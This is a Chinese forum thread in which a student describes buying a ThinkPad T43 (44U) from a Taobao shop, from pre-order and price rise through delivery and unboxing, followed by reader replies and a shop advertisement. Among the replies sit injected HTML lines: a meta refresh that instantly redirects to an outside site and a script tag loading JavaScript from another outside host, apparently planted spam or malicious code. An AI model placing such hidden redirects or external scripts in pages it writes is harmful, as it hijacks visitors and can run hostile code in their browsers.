开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

全款预订44U(详细的购机日记、图片已上,申请VIP)

本本已经买了一个星期了,现在课也很多,所以直到现在才抽空出来写
相比起其他买本的兄弟,我想我可能是看得网站比较多的了,我前前后后总共看了10个左右的卖本网站,经过再三比较,最终还是决定在翔意出手,因为综合起来看,我感觉翔意是最好的,其他几家比起翔意要么输在价格要么输在服务(当然,这只是我个人感受,如有不同意见的兄弟,请多包涵),呵呵,说多了,现在说正事
自从打算买本以来,就没想过再买其他牌子的,还记得当时T40刚出来,我第一次看到T40时那种惊艳的感觉,真的,对别的牌子的本本我从来没有这种感觉的,到现在为止,我还是觉得所有笔记本里包括IBM,T4X系列的造型外观最好看,也最成熟大气,上大学这几年间,我也用过不少本本(偶以前的本本是R40E,两年多前买的,还有同学的像东芝、戴尔、索尼、联想,NEC,HP等),感觉还是IBM用着最舒服,各种人性化设置真的不是吹出来的,看了又看,最终还是把目光锁定在了T43上,然后又比较了几个网站,最终决定就是翔意了
本来是准备二月底买的,可当时钱还没到,就等到三月初,等到了之后,马上跟翔意联系,可谁知第一次问44U竟然没货了,真是郁闷啊,只好等,过了几天,又联系翔意,因为看论坛上BH7的状态是预订,我想44U没有货,那我预订BH7应该可以吧,因为BH7也够用了,大不了也就是再添根内存,CPU少那么0.1我一般运用也感觉不出来,可翔意工作人员说BH7订不到货了,说44U第二天晚上到,不过价钱涨了200,偶当时真的是快晕了,虽然在之前在网上了解到深圳那边过关的问题,拖工费用涨价,可没想到这么快就涨了,如果这时买的话可是要从偶生活费里扣这200元啊,犹豫了一会,想虽然中国的政府部门向来都有虎头蛇尾的惯例,也许过一段时间价格还会再降下来,可最起码人家是有个虎头在先,鬼知道这次涨价会持续到什么时候,要是过一段再涨那岂不是更郁闷,而且现在我也等着用,就决定不等了,出手!
接下来就很简单了,晚上联系翔意,说准备全款预订一台44U,有问了一下细节问题,说好第二天打款,然后要了账号,第二天上午上完课就跟两个同学一块到浦发银行汇了款,又把分区、地址等信息发短信给翔意,就下来就等了
3月9号中午QQ问了一下,因为以为今天会到(原来说是3月8号发货),可一问,说是今天才发货,唉,只好再等,10号是星期五,上午没有接到电话,那就肯定是下午到了,下午上课时,我还特意挑了后面的座位坐,边听课边等,第一节下课,还是没有电话,第二节上课,才刚坐到位置上,想究竟什么时候到货时,电话响了,我第一个反应就是肯定是快递公司的,跑出教室,果然,是顺风快递的,电话里说:“你好,是X先生吗?我是快递公司的……”,天哪,我敢发誓这是我听过最好听的声音之一。说好了交货地点,飞奔过去,等了一会,快递的人骑着摩托车来了,交货,然后就是签字,不过奇怪的是整个过程他都没有让我出示身份证(偶这两天可是一直带到身上的,呵呵),最后还是我问“要看身份证吗?”,那位大叔手一摆说不用了,偶当时心里那个寒啊,不管那么多了,抱着包裹冲回宿舍,拿剪刀开始拆封,翔意的包裹可真是结实啊,偶又是剪又是拽的,就差没用脚了,呵呵,最后打开外包装箱,第一眼看到的是原装的红点包,拿出来,就就看到黑色封面的THINKPAD包装箱了(说实话,偶还是觉得以前的包装箱好看),打开箱子,看见偶得T43静静的躺在里面,真是……,没那么多时间欣赏,偶还要回去听课呢,立马拿出来,开机,看了看屏幕,无点,又粗略的看了看电脑属性,就关机,然后提着电脑奔回教室上课了……
用了一个多星期了,上网也对了各部件的FRU号,也都是原装的,感觉很满意,上PP

+30---EddieFan

评分

EddieFan + 30

好的
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

偶的拍照技术不行,各位兄弟见谅,呵呵

查到,明天发出,后天到
标签

标签

标签
指纹识别,很好用,偶几乎是100%一次通过

键盘

键盘

型号

型号

真羡慕啊
哥们医生啊!!!!!!!!
谢谢支持,贵宾已加.
眼馋ing...^o^
实在是羡慕呀,哈
什么时候才能攒够啊~~`真羡慕LZ

一个字“羡”

真羡慕LZ啊!!!

好大的图片 强悍
哎,慢慢攒了

能说说44U和BH6之间的比较吗?为什么选44U?

路过,支持一下~~~~